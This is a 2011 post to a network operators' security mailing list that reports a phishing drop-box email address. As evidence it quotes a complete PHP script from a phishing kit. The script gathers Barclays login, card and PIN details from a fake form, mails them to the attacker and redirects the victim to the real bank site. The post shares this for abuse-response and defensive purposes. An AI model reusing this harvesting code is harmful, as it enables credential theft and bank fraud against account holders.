[nsp-sec] gmail phishing drop-box
Chris Morrow
morrowc at ops-netman.net
Mon Jun 13 19:28:38 EDT 2011
tco
On 06/13/11 16:07, Rodolfo Baader wrote:
> while investigating a phishing case, we've found the following dropbox:
> "s9800054 at gmail.com"
>
> Evidence:
> ==============================================================================
> <?
> $to = "s9800054 at gmail.com";
> //-----------------------------------
> $surname = $_POST['surname'];
> $membershipNo = $_POST['membershipNo'];
> $passCode = $_POST['passCode'];
> $memorableword = $_POST['memorableword'];
> $FirstName = $_POST['FirstName'];
> $Surname1 = $_POST['Surname1'];
> $DD = $_POST['DD'];
> $MM = $_POST['MM'];
> $YYYY = $_POST['YYYY'];
> $sortcode = $_POST['sortcode'];
> $Accountnumber = $_POST['Accountnumber'];
> $ElectroncardNo = $_POST['ElectroncardNo'];
> $EXmm = $_POST['EXmm'];
> $exYYYY = $_POST['exYYYY'];
> $securitycode = $_POST['securitycode'];
> $Hnn = $_POST['Hnn'];
> $MMn = $_POST['MMn'];
> $TelePin = $_POST['TelePin'];
> $Postcode = $_POST['Postcode'];
> $ip = $_SERVER['REMOTE_ADDR'];
> $subj = "Barclay's Info";
> $msg = "Surname : $surname\nMembership number : $membershipNo\nFive-digit
> passcode : $passCode\nEnter Your memorable word : $memorableword\nFirst Name :
> $FirstName\nSurname : $Surname1\nDate of Birth : $DD-$MM-$YYYY\nCurrent account
> sort code : $sortcode\nCurrent account number : $Accountnumber\n16-digit
> Connect/Electron card number : $ElectroncardNo\nExpire Date :
> $EXmm-$exYYYY\nThree-digit security code : $securitycode\nHouse number or name :
> $Hnn\nMaiden Name : $MMn\nTelephone banking Pin : $TelePin\nPost Code :
> $Postcode\nip : $ip";
> $from = "FROM: BraIn Inc.� '08<membership at barclays.co.uk>";
> {mail($to,$subj,$msg,$from);}
> header("location: http://www.barclays.co.uk/");
> ?>
>
> ==============================================================================
>
> R.
More information about the nsp-security
mailing list